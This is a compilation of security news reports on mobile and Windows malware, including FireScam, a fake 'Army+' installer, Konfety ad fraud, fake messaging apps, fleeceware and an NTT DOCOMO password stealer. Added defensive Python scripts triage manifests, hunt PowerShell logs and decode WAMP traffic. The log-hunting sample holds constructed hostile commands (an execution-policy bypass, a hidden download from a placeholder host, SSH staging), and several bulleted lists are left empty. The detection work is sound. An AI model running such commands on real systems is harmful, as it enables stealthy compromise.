A newly discovered Android malware, FireScam, is being distributed through phishing websites on GitHub, masquerading as a premium version of the Telegram application. These malicious sites impersonate RuStore, a Russian app marketplace, to deceive users into downloading the infected software.
RuStore, launched by Russian tech giant VK (VKontakte) in May 2022, was developed as an alternative to Apple's App Store and Google Play following Western sanctions that restricted Russian users' access to global platforms. This marketplace hosts apps that comply with Russian regulations and operates under the oversight of the Russian Ministry of Digital Development.
According to security researchers at CYFIRMA, attackers have set up a fraudulent GitHub page mimicking RuStore. This fake website delivers a dropper module named GetAppsRu.apk. Once installed, the dropper requests extensive permissions, allowing it to scan installed applications, access device storage, and install additional software. It then downloads and executes the main malware payload, disguised as Telegram Premium.apk. This secondary payload enables the malware to monitor notifications, read clipboard data, access SMS and call information, and collect other sensitive details.
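The dropper's permission profile described above is visible in its manifest before the app ever runs. The following added example (not CYFIRMA's tooling, and the manifest it parses is constructed, not FireScam's) shows a static triage pass over a decoded AndroidManifest.xml: it groups the requested permissions into the capability buckets the report lists and flags the combination of package enumeration plus side-loading that characterises a dropper. It assumes the APK has already been decoded so that the manifest is plain XML.

```python
"""Triage a decoded Android manifest for dropper-like capabilities.

Added example, not code from the original report. Assumes AndroidManifest.xml
has already been decoded to plain XML (e.g. with apktool). The sample
manifest below is constructed for illustration.
"""
import json
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Capability buckets named in the report, mapped to the manifest
# permissions that grant them.
CAPABILITIES = {
    "install_apps": {"android.permission.REQUEST_INSTALL_PACKAGES"},
    "enumerate_apps": {"android.permission.QUERY_ALL_PACKAGES"},
    "storage": {"android.permission.READ_EXTERNAL_STORAGE",
                "android.permission.WRITE_EXTERNAL_STORAGE",
                "android.permission.MANAGE_EXTERNAL_STORAGE"},
    "sms": {"android.permission.READ_SMS", "android.permission.RECEIVE_SMS"},
    "calls": {"android.permission.READ_CALL_LOG",
              "android.permission.READ_PHONE_STATE"},
}
# Notification access is declared on a <service>, not as a uses-permission.
NOTIFICATION_LISTENER = "android.permission.BIND_NOTIFICATION_LISTENER_SERVICE"

# Constructed sample manifest (hypothetical package name and service name).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.fakestore">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>
  <uses-permission android:name="android.permission.QUERY_ALL_PACKAGES"/>
  <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <application android:label="GetApps">
    <service android:name=".NotifySvc"
             android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
      <intent-filter>
        <action android:name="android.service.notification.NotificationListenerService"/>
      </intent-filter>
    </service>
  </application>
</manifest>
"""


def triage_manifest(xml_text):
    """Return the package name, the capabilities found, and a dropper flag."""
    root = ET.fromstring(xml_text)
    requested = {el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")}

    found = {}
    for cap, perms in CAPABILITIES.items():
        matched = sorted(requested & perms)
        if matched:
            found[cap] = matched

    listeners = [svc.get(ANDROID_NS + "name") for svc in root.iter("service")
                 if svc.get(ANDROID_NS + "permission") == NOTIFICATION_LISTENER]
    if listeners:
        found["notifications"] = listeners

    # Heuristic: an app that enumerates installed packages *and* can side-load
    # new ones matches the dropper behaviour described in the report.
    dropper_like = "install_apps" in found and "enumerate_apps" in found
    return {"package": root.get("package"),
            "capabilities": found,
            "dropper_like": dropper_like}


if __name__ == "__main__":
    print(json.dumps(triage_manifest(SAMPLE_MANIFEST), indent=2))
```

Run it against a real decoded manifest by replacing SAMPLE_MANIFEST with the file contents; the heuristic is deliberately conservative, since legitimate app stores also request REQUEST_INSTALL_PACKAGES, so treat a hit as a reason to look closer rather than a verdict.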
Once activated, FireScam presents users with a deceptive WebView-based Telegram login page designed to steal credentials. The malware communicates with Firebase Realtime Database, allowing stolen data to be uploaded instantly. It also assigns unique identifiers to compromised devices, enabling hackers to track them.
Stolen data is temporarily stored before being filtered and transferred to another location, ensuring that traces are erased from Firebase. Additionally, FireScam establishes a persistent WebSocket connection with the Firebase command-and-control (C2) server, enabling real-time command execution. This allows attackers to:
Furthermore, the malware can:
While the identity of FireScam’s operators remains unknown, CYFIRMA researchers warn that the malware exhibits advanced evasion techniques and poses a serious threat to users. To minimize the risk of infection, users should:
As attackers continue refining their tactics, staying vigilant against phishing campaigns and suspicious downloads is essential to protecting personal and financial data.
Cybersecurity experts report a malware campaign targeting Ukrainian military personnel. The malware is spread through a fake installer for an app called "Army+". The installer looks legitimate but embeds malicious code: it installs the Tor browser and uses a hidden PowerShell script to carry out its malicious activity, abusing Tor for covert communication rather than for the private browsing it was built for.
How the Malware Works
The installation process starts with the fake app ArmyPlusInstaller. It launches a decoy application, ArmyPlus.exe, to avoid suspicion. In the background, a hidden script, init.ps1, works to bypass security restrictions on the system.
PowerShell's execution policy would normally block such an unauthorized script. The malware, however, changes that setting with specific PowerShell commands so that it can run freely. It also shrinks the console window to hide its activity and keep up the illusion of a normal installation, and it plants its files in strategic locations.
The malware spreads its files throughout the folders of the system to remain hidden. For instance, the Tor browser files are stored in a directory called OneDriveData, while OpenSSH files, which give the attackers remote access, are kept in a folder called ssh.
This init.ps1 script plays a crucial role as it can pull down and install the Tor browser for use in secret operations. The init.ps1 script establishes communication between the compromised computer and the attacker, giving them an avenue through which to command the system from a stealth position.
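The behaviours attributed to init.ps1 above (the execution-policy change, the shrunken console window, the download of Tor, and the OneDriveData and ssh staging folders) all leave traces in PowerShell Script Block Logging (Event ID 4104). The following added example, which is not code from the campaign or from any report on it, hunts for those traces in exported script-block text; the log entries are constructed for illustration and the download URL in them is a placeholder.

```python
"""Hunt PowerShell script-block log text for the behaviours described above.

Added example. Assumes you have exported the ScriptBlockText of Event ID
4104 entries (Microsoft-Windows-PowerShell/Operational), one entry per
script. The entries below are constructed; the URL is a placeholder.
"""
import re

# Each indicator is one behaviour attributed to init.ps1, expressed as a
# case-insensitive regex over the logged script text.
INDICATORS = {
    "execution_policy_bypass": re.compile(
        r"Set-ExecutionPolicy\s+(Bypass|Unrestricted)|-ExecutionPolicy\s+Bypass", re.I),
    "console_hidden_or_shrunk": re.compile(
        r"\$host\.UI\.RawUI\.WindowSize|-WindowStyle\s+Hidden", re.I),
    "tor_in_onedrivedata": re.compile(r"OneDriveData\\.*tor", re.I),
    "openssh_staging": re.compile(r"\\ssh\\.*(sshd|ssh\.exe)", re.I),
    "tor_download": re.compile(r"(Invoke-WebRequest|DownloadFile).*tor", re.I),
}

SAMPLE_EVENTS = [
    {"id": 101, "script": "Get-ChildItem C:\\Users\\a\\Documents"},
    {"id": 102, "script": (
        "Set-ExecutionPolicy Bypass -Scope Process -Force\n"
        "$host.UI.RawUI.WindowSize = New-Object System.Management.Automation.Host.Size(1,1)\n"
        "Invoke-WebRequest https://example.invalid/tor.zip -OutFile $env:APPDATA\\OneDriveData\\tor.zip\n"
        "Expand-Archive $env:APPDATA\\OneDriveData\\tor.zip $env:APPDATA\\OneDriveData\n"
        "Copy-Item .\\sshd.exe $env:APPDATA\\ssh\\sshd.exe")},
    {"id": 103, "script": "powershell -ExecutionPolicy Bypass -File .\\deploy.ps1"},
]


def score_event(script):
    """Return the names of every indicator that matches one script block."""
    return [name for name, rx in INDICATORS.items() if rx.search(script)]


def hunt(events, min_hits=2):
    """Return events with at least min_hits indicators.

    A lone execution-policy bypass is common in admin tooling, so by default
    we require corroborating behaviour before raising an event.
    """
    results = []
    for ev in events:
        hits = score_event(ev["script"])
        if len(hits) >= min_hits:
            results.append({"id": ev["id"], "hits": hits})
    return results


if __name__ == "__main__":
    for r in hunt(SAMPLE_EVENTS):
        print(r["id"], ", ".join(r["hits"]))
```

The threshold is the important design choice: the single-indicator event 103 is ordinary deployment tooling and stays quiet, while event 102 trips every indicator at once. In a real hunt, feed the function the ScriptBlockText field of each 4104 event (for example via Get-WinEvent exported to JSON) rather than the constructed list.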
Backdoor That Survives Reboot
After installation, the malware establishes a backdoor through which the attackers can command the system remotely. It transmits system information together with a public RSA key over Tor to a remote server, allowing the attackers' side to encrypt its communication with that key. In this way an attacker can issue commands and, if those commands succeed, end up with high-level control of the system.
Exploiting User Trust
The malicious installer masquerades as an ordinary program installation and requests administrative credentials, which unwary users may grant. Once the visible front-end app fails, the malicious instructions execute silently in the background, including gathering sensitive information and transmitting it.
Why Is This Important
This incident highlights how cybercriminals exploit everyday tools, like PowerShell and Tor, to hide their attacks. In this way, they mimic legitimate software, making it harder for standard defenses to detect them.
It is a reminder for all of us to download software only from trusted sources and for organizations to regularly update their security measures. Being alert will help prevent such stealthy cyberattacks from succeeding.
This development underlines the increasing nuances in cyber threats in conflict zones as attackers continue to evolve their techniques to evade detection.
In a major development, the HUMAN Satori Threat Intelligence and Research Team has successfully dismantled a vast mobile advertising fraud operation known as "Konfety." This scheme, which generated billions of fake ad requests each day, was designed to deceive both users and advertisers on a large scale.
The Konfety scammers used a mobile advertising tool called CaramelAds to carry out their scheme. They created numerous fake apps, which appeared to be ordinary games on the Google Play Store. These apps were actually just a front for the fraud. The core of the scam involved "evil twin" apps—modified versions of CaramelAds that did not follow privacy regulations and were used to show fraudulent ads.
The fraudulent apps were designed to mimic genuine user activity. They displayed unwanted ads, opened websites without user consent, and used various tactics to create the illusion of legitimate traffic. This allowed the scammers to profit from fake ad views and clicks, deceiving both users and advertisers.
Upon discovering the fraud, the HUMAN team quickly implemented measures to block the fraudulent traffic. They flagged suspicious activity and worked with ad networks to stop the scam. In response, the fraudsters tried to shift their operations to other networks not protected by HUMAN, but their efforts were largely thwarted by HUMAN’s protective measures.
Google Play Protect was crucial in identifying and removing the fraudulent apps. Despite its efforts, the scale of the Konfety scheme highlighted the ongoing challenge of preventing such sophisticated scams. Google continues to monitor and protect users from these threats.
HUMAN’s team developed specific detection techniques for the Konfety scam and shared their findings with other security experts. This collaboration led to a significant reduction in fraudulent ad requests and enhanced overall security in digital advertising.
The shutdown of the Konfety fraud shows what vigilance and cooperation can achieve against online scams. As cybercriminals continue to evolve their tactics, HUMAN's ongoing efforts to safeguard the integrity of digital advertising, and industry collaboration more broadly, remain essential to a secure online environment.
However, with the rise in popularity of messaging apps such as Signal and Telegram, there has also been an increase in fake apps that pose as extensions or premium versions of these platforms.
In this blog post, we will discuss the recent discovery of fake Signal and Telegram apps that have been found to sneak malware into thousands of Android phones.
Researchers at the cybersecurity firm ESET recently discovered fake apps in the Google and Samsung app stores that posed as extensions or premium versions of the popular messaging platforms Signal and Telegram.
These malicious apps, called Signal Plus Messenger and FlyGram, were designed to steal user data. When users took certain actions, these fake apps could pull sensitive information from legitimate Signal and Telegram accounts, including call logs, SMS messages, locations and more.
By stealing sensitive information from legitimate Signal and Telegram accounts, these malicious apps can compromise the privacy and security of users’ conversations.
This can lead to identity theft, financial fraud, and other forms of cybercrime. It is therefore important for users to be vigilant when downloading apps from app stores and to only download apps from trusted sources.
Cybersecurity firm Sophos has warned users about fake ChatGPT apps. It says that downloading these apps is risky: they have almost no functionality and continually push advertisements. According to the report, the apps lure unaware users into a subscription that can cost hundreds of dollars a year.
Sophos refers to these fake ChatGPT apps as fleeceware, describing them as apps that bombard users with adverts until they give in and buy a subscription. They are deliberately built to be of little use once the free trial ends, so that users delete them without realizing they are still obligated to make weekly or monthly payments.
According to the report, five bogus ChatGPT apps were investigated, with names such as "Chat GBT" chosen to deceive users and to boost their visibility in Google Play or App Store rankings. The research also noted that these fake apps charged users anywhere from $10 per month to $70 per year, whereas OpenAI's ChatGPT offers its key functionality free online. Another scam app, Genie, lured users into subscribing for $7 weekly or $70 annually, generating $1 million in revenue over the previous month.
“Scammers have and always will use the latest trends or technology to line their pockets. ChatGPT is no exception," said Sean Gallagher, principal threat researcher, Sophos. "With interest in AI and chatbots arguably at an all-time high, users are turning to the Apple App and Google Play Stores to download anything that resembles ChatGPT. These types of scam apps—what Sophos has dubbed ‘fleeceware’—often bombard users with ads until they sign up for a subscription. They’re banking on the fact that users won’t pay attention to the cost or simply forget that they have this subscription. They’re specifically designed so that they may not get much use after the free trial ends, so users delete the app without realizing they’re still on the hook for a monthly or weekly payment."
While some of the bogus ChatGPT fleeceware apps have already been identified and removed from the app stores, they are expected to resurface. Users are therefore advised to stay cautious of such fake apps and to make sure the apps they download are legitimate.
Users who have already downloaded these apps are advised to follow the App Store's or Google Play's procedure for unsubscribing, since simply deleting the bogus app does not cancel the subscription.
McAfee's Mobile Research team has observed a new malware family attacking NTT DOCOMO customers in Japan.
Distributed through the Google Play Store, the malware poses as a legitimate mobile security app, but it is in fact a fraud tool designed to steal passwords and to abuse a reverse proxy, targeting customers of NTT DOCOMO's mobile service.
McAfee's Mobile Research team reported the malware to Google. In response, Google removed the application from Google Play and took down known Google Drive files associated with it. Google Play Protect now also warns users and disables the apps.
The operators publish the malicious apps on Google Play under several developer accounts, styled to look like legitimate apps. According to a tweet by Yusuke Osumi, a security researcher at Yahoo, the attacker lures victims into installing the malware by sending them an SMS message containing a Google Play link, reportedly sent from overseas, and telling them that their security software must be updated.
The victim thus installs the fraudulent app from Google Play and unknowingly installs the malware. The app asks the user for their network password and, whatever they type, claims it is incorrect and asks them to enter it again more carefully. Whether or not the entries are correct does not matter to the attacker: the captured network password can later be used for NTT DOCOMO's payment services, giving the attacker access to the victim's funds.
The malware then displays a fake "Mobile Security" screen; notably, its layout resembles an outdated version of the McAfee Mobile Security interface.
How does the malware function
A native library named libmyapp.so, written in Go, is loaded when the app runs. On load it tries to connect to the command-and-control (C&C) server over a WebSocket, and then uses WAMP (Web Application Messaging Protocol) to communicate and to carry out remote procedure calls (RPC). Once the connection is established, the malware transmits the network information and the victim's phone number, and registers the procedures that the client will execute on command. From then on the library acts as an agent, running commands as they arrive from the server; when the victim enters their network password, the socket is used to send it to the attacker.
The attacker uses this leaked information to make fraudulent purchases. To do so, the RPC command 'toggle_wifi' switches the victim's Wi-Fi connection on or off, and 'connect_to' provides the attacker with a reverse proxy, which allows connections to a host behind network address translation (NAT) or a firewall. Through this proxy the attacker can send requests over the victim's mobile network connection.
Beyond whatever other methods the attackers may use, the malware can use the reverse proxy to obtain the user's mobile and network information and run an agent service over WAMP for fraudulent purposes. Mobile security organizations therefore advise users to be careful when entering a password or other confidential information into a little-known or suspicious application.
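The WAMP exchange described above can be reconstructed from a WebSocket capture, but not frame by frame: an INVOCATION from the server carries only a registration id, and the procedure name appears earlier, in the client's REGISTER and the server's REGISTERED reply. The following added example (not McAfee's analysis code) correlates those frames using the message-type codes from the WAMP basic profile and flags invocations of the two procedures named in the report. The frames are constructed for illustration; the address and port in the connect_to arguments are placeholders, and the argument layout of the malware's own RPCs is assumed, not taken from the report.

```python
"""Correlate WAMP frames from a WebSocket capture into named RPC invocations.

Added example, not McAfee's tooling. Assumes WAMP's JSON serialization and
the basic-profile message codes REGISTER=64, REGISTERED=65, INVOCATION=68.
The frames below are constructed; argument layouts and the address are
placeholders, not values from the report.
"""
import json

REGISTER, REGISTERED, INVOCATION = 64, 65, 68

# RPC names the report attributes to the malware.
SUSPICIOUS_PROCS = {"toggle_wifi", "connect_to"}

# Constructed capture, client and server frames in wire order.
SAMPLE_FRAMES = [
    '[1, "realm1", {"roles": {"callee": {}}}]',        # HELLO   (client)
    '[2, 5001, {"roles": {"dealer": {}}}]',            # WELCOME (server)
    '[64, 1, {}, "toggle_wifi"]',                      # REGISTER request 1
    '[65, 1, 9001]',                                   # REGISTERED -> registration 9001
    '[64, 2, {}, "connect_to"]',                       # REGISTER request 2
    '[65, 2, 9002]',                                   # REGISTERED -> registration 9002
    '[68, 77, 9001, {}, [false]]',                     # INVOCATION of registration 9001
    '[68, 78, 9002, {}, ["203.0.113.10", 8080]]',      # INVOCATION of registration 9002
    '[70, 78, {}, ["ok"]]',                            # YIELD (client reply)
]


def correlate(frames):
    """Map registration ids back to procedure names and list invocations."""
    pending = {}    # REGISTER request id -> procedure uri (awaiting REGISTERED)
    registry = {}   # registration id -> procedure uri
    invocations = []
    for raw in frames:
        msg = json.loads(raw)
        kind = msg[0]
        if kind == REGISTER:
            pending[msg[1]] = msg[3]
        elif kind == REGISTERED:
            # REGISTERED echoes the REGISTER request id and assigns the registration id.
            registry[msg[2]] = pending.pop(msg[1], "<unknown>")
        elif kind == INVOCATION:
            proc = registry.get(msg[2], "<unregistered>")
            args = msg[4] if len(msg) > 4 else []
            invocations.append({"request": msg[1], "procedure": proc, "args": args})
    return registry, invocations


def flag_suspicious(invocations):
    """Keep only invocations of the procedures named in the report."""
    return [inv for inv in invocations if inv["procedure"] in SUSPICIOUS_PROCS]


if __name__ == "__main__":
    registry, invocations = correlate(SAMPLE_FRAMES)
    for inv in flag_suspicious(invocations):
        print(inv["procedure"], inv["args"])
```

The point of the two-step lookup is that a capture filtered only on INVOCATION frames shows nothing but opaque ids; the REGISTER/REGISTERED pair earlier in the session is what tells you that registration 9002 is the reverse-proxy command and which host the attacker asked the device to reach.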